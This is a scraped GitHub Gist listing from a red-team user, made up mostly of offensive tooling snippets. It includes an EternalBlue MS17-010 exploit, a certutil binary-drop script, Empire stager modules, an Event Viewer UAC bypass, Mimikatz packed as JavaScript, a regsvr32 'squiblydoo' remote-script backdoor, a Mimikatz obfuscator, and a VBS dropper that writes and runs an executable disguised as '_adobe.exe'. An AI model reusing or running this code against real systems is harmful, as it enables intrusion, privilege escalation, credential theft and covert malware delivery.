Skip to content

Instantly share code, notes, and snippets.

View infosecn1nja's full-sized avatar
🇮🇩
Working from home

Rahmat Nurfauzi infosecn1nja

🇮🇩
Working from home
View GitHub Profile
@infosecn1nja
infosecn1nja / drop_binary.sh
Created July 16, 2017 00:11
Drop binary executable using certutil on windows
#!/bin/bash
# drop_binary.sh
# ./drop_binary.sh /usr/share/windows-binaries/nc.exe nc.txt
# certutil -decode encoded.txt decoded.bin
echo "-----BEGIN CERTIFICATE-----" > $2
cat $1 | base64 >> $2
echo "-----END CERTIFICATE-----" >> $2
sed -i 's/^/echo /g' $2 && sed -i 's/$/ >> encoded.txt/g' $2
@infosecn1nja
infosecn1nja / starfighter_js.py
Created July 21, 2017 23:45
Empire stagers module to generates a .js launcher.
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'JS Launcher StarFighter',
'Author': ['Cn33liz'],
@infosecn1nja
infosecn1nja / eternalblue7_exploit.py
Created July 22, 2017 01:04 — forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@infosecn1nja
infosecn1nja / EventVwrBypass.cs
Created July 22, 2017 01:04 — forked from leoloobeek/EventVwrBypass.cs
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
@infosecn1nja
infosecn1nja / katz.js
Created July 22, 2017 01:05
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
@infosecn1nja
infosecn1nja / Agentless-Post-Exploitation.md
Created July 22, 2017 01:07
Agentless Post-Exploitation

Agentless Post-Exploitation

Reconnaissance

echo %LOGONSERVER%
net view /DOMAIN:domain

Check Administrators Rights

@infosecn1nja
infosecn1nja / starfighter_vbs.py
Created July 24, 2017 09:01
Empire stagers module to generates a .vbs launcher.
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'VBS Launcher StarFighter',
'Author': ['Cn33liz'],
@infosecn1nja
infosecn1nja / Backdoor-Minimalist.sct
Created August 17, 2017 01:11
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
#!/bin/bash
if [[ $# -le 1 ]] ; then
echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1'
exit 1
fi
randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};}
cp $1 $2
#!/bin/bash
convert2hex=$(xxd -p $1)
result=$(echo $convert2hex | sed s'/ //g')
echo 'Function n(s,c):n=String(s,c):End Function:t=t&"'$result'":Set s=CreateObject("Scripting.FileSystemObject"):p=s.getspecialfolder(2) & "_adobe.exe":Set f=s.CreateTextFile(p,1):for i=1 to len(t) step 2:f.Write Chr(int("&H" & mid(t,i,2))):next:f.Close:WScript.CreateObject("WScript.Shell").run(p)'